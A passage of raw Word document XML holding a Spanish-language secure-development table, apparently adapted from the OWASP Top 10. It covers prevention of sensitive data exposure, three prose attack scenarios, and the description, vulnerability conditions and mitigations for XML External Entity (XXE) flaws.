                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Utilice únicamente algoritmos y protocolos estándares y fuertes e implemente una gestión adecuada de claves. No cree sus propios algoritmos de cifrado. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Deshabilite el almacenamiento en cache de datos sensibles. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Almacene contraseñas utilizando funciones de hashing adaptables con un factor de trabajo (retraso) además de SALT, como Argon2, scrypt, bcrypt o PBKDF2. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Verifique la efectividad de sus configuraciones y parámetros de forma independiente.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidTr="00296F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0" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00945F2A">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Ejemplos de escenarios de ataque</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00945F2A" w:rsidRDefault="00912EEA" w:rsidP="00945F2A">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:color w:val="FF0000"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Escenario #1: </w:t>
            </w:r>
            <w:r w:rsidRPr="00945F2A">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>una aplicación cifra números de tarjetas de crédito en una base de datos utilizando su cifrado automático. Sin embargo, estos datos son automáticamente descifrados al ser consultados, permitiendo que, si existe un error de inyección SQL se obtengan los números de tarjetas de crédito en texto plano.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00945F2A" w:rsidRDefault="00912EEA" w:rsidP="00945F2A">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:color w:val="70AD47"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Escenario #2: </w:t>
            </w:r>
            <w:r w:rsidRPr="00945F2A">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>un sitio web no utiliza o fuerza el uso de TLS para todas las páginas, o utiliza cifradores débiles. Un atacante monitorea el tráfico de la red (por ejemplo en una red Wi-Fi insegura), degrada la conexión de HTTPS a HTTP e intercepta los datos, robando las cookies de sesión del usuario. El atacante reutiliza estas cookies y secuestra la sesión del usuario (ya autenticado), accediendo o modificando datos privados. También podría alterar los datos enviados.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00945F2A">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Escenario #3: </w:t>
            </w:r>
            <w:r w:rsidRPr="00945F2A">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">se utilizan hashes simples o hashes sin SALT para almacenar las contraseñas de los usuarios en una base de datos. Una falla en la carga de archivos permite a un atacante obtener las contraseñas. Utilizando una Rainbow Table de valores </w:t>
            </w:r>
            <w:r w:rsidR="00AE1910">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>pre-</w:t>
            </w:r>
            <w:r w:rsidR="00945F2A" w:rsidRPr="00945F2A">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>calculados</w:t>
            </w:r>
            <w:r w:rsidRPr="00945F2A">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>, se pueden recuperar las contraseñas originales.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidTr="00296F9B">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="12180" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251693056" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="12A4AE0B" wp14:editId="52B59338">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>-65347</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>6350</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="1609950" cy="1019317"/>
                  <wp:effectExtent l="0" t="0" r="9525" b="952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54E25A.tmp"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId80">
                            <a:extLst>
                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1609950" cy="1019317"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                  <wp14:sizeRelH relativeFrom="page">
                    <wp14:pctWidth>0</wp14:pctWidth>
                  </wp14:sizeRelH>
                  <wp14:sizeRelV relativeFrom="page">
                    <wp14:pctHeight>0</wp14:pctHeight>
                  </wp14:sizeRelV>
                </wp:anchor>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00AE1910">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Entidades Externas XML (XXE)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidTr="00296F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0" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00024C67" w:rsidRDefault="00912EEA" w:rsidP="00024C67">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00024C67">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Muchos procesadores XML antiguos o mal configurados evalúan referencias a entidades externas en documentos XML. Las entidades externas pueden utilizarse para revelar archivos internos mediante la URI o archivos internos en servidores </w:t>
            </w:r>
            <w:r w:rsidRPr="00024C67">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>no actualizados, escanear puertos de la LAN, ejecutar código de forma remota y realizar ataques de denegación de servicio (DoS).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidTr="00296F9B">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="12180" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00024C67" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00024C67">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251694080" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1ADDA02A" wp14:editId="43563669">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>-65405</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>237490</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="8217535" cy="837565"/>
                  <wp:effectExtent l="0" t="0" r="0" b="635"/>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44BD0E.tmp"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId81">
                            <a:extLst>
                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="8217535" cy="837565"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                  <wp14:sizeRelH relativeFrom="page">
                    <wp14:pctWidth>0</wp14:pctWidth>
                  </wp14:sizeRelH>
                  <wp14:sizeRelV relativeFrom="page">
                    <wp14:pctHeight>0</wp14:pctHeight>
                  </wp14:sizeRelV>
                </wp:anchor>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00167841" w:rsidRPr="00912EEA" w:rsidTr="00296F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rsidR="00912EEA" w:rsidRPr="00024C67" w:rsidRDefault="00912EEA" w:rsidP="00024C67">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00024C67">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Los atacantes pueden explorar procesadores XML vulnerables si cargan o incluyen contenido hostil en un documento XML, explotando código vulnerable, dependencias o integraciones.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4961" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00024C67">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">De forma predeterminada, muchos procesadores XML, antiguos permiten la especificación de una entidad externa, una URL que se referencia y evalúa durante el procesamiento XML. </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3680" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00024C67">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Estos defectos se pueden utilizar para extraer datos, ejecutar una solicitud remota desde el servidor, escanear sistemas internos, realizar un ataque de denegación de servicio y ejecutar otro tipo de ataques.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidTr="00296F9B">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="6091" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>¿La aplicación es vulnerable?</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00646906" w:rsidRDefault="00912EEA" w:rsidP="00646906">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00646906">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Las aplicaciones y, en particular servicios web basados en XML, o integraciones que utilicen XML, pueden ser vulnerables a este ataque si:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00646906" w:rsidRDefault="00912EEA" w:rsidP="00646906">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00646906">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">La aplicación acepta XML directamente, carga XML desde fuentes no confiables o inserta datos no confiables en documentos XML. Por último, estos </w:t>
            </w:r>
            <w:r w:rsidRPr="00646906">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>datos son analizados sintácticamente por un procesador XML.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00646906" w:rsidRDefault="00912EEA" w:rsidP="00646906">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00646906" w:rsidRDefault="00912EEA" w:rsidP="00646906">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00646906">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Cualquiera de los procesadores XML utilizados en la aplicación o los servicios web basados en SOAP, poseen habilitadas las definiciones de tipo de documento (DTDs). Dado que los mecanismos exactos para deshabilitar el procesamiento de DTDs varía para cada procesado.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00646906" w:rsidRDefault="00912EEA" w:rsidP="00646906">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00646906">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>La aplicación utiliza SAML para el procesamiento de identidades dentro de la seguridad federada o para propósitos de Single Sign-On (SSO). SAML utiliza XML para garantizar la identidad de los usuarios y puede ser vulnerable.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00646906" w:rsidRDefault="00912EEA" w:rsidP="00646906">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00646906">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">La aplicación utiliza SOAP en una versión previa a la 1.2 y, si las entidades XML son pasadas a la infraestructura SOAP, probablemente sea susceptible a ataques XXE. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00646906" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00646906">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Ser vulnerable a ataques XXE significa que probablemente la aplicación también es vulnerable a ataques de denegación de servicio</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6089" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Plan de contingencia</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>El entrenamiento del desarrollador es esencial para identificar y mitigar defectos de XXE. Aparte de esto, prevenir XXE requiere:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">De ser posible, utilice formatos de datos menos complejos como JSON y evite la serialización de datos confidenciales. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Actualice los procesadores y bibliotecas XML que utilice la aplicación o el sistema subyacente. Utilice validadores de dependencias.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
